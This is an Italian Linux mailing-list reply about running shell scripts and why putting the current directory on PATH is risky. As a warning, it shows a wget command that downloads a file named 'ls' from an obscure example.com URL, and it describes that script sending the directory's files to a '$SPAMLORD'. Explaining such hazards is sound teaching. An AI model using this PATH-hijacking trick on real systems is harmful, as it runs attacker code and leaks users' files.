[linux_var] Modalita' esecuzione script

Elena of Valhalla elena.valhalla a gmail.com
Gio 17 Lug 2008 14:37:35 UTC

Ciao

On Thu, Jul 17, 2008 at 4:23 PM, 0bscure <obscure9 a gmail.com> wrote:
> In alcune macchine se devo lanciare uno script, pippo.sh per esempio devo
> fare:
> # . ./pippo.sh

. ?

non mi e` mai capitato, di solito e` semplicemente
$ ./pippo.sh

> mentre in altre mi basta lanciare il nome dello script
> Perche'? Mi pare sia un parm di config della shell?

per poter usare
$ pippo.sh
la directory corrente (.) deve far parte del PATH

la si puo` aggiungere temporaneamente con
export PATH=$PATH:.
ma in generale e` una pessima idea: in questo modo diventa molto piu`
facile eseguire per errore software di dubbia provenienza, magari
anche dannoso

in ogni caso e` importante metterla almeno alla fine del PATH, in modo
tale che non si possano lanciare inavvertitamente versioni modificate
dei comandi standard

ad esempio

$ wget http://www.example.com/un/url.lunga/e/complicata.che.non.faccia/venire/voglia/di/leggerla.html/0289jkd
jnje33/ls
$ ls

uooops, il file appena scaricato (con nome "ls") era uno script che
spediva tutti i file nella directory corrente a $SPAMLORD e poi
eseguiva ls

non una buona idea...

--
Elena of Valhalla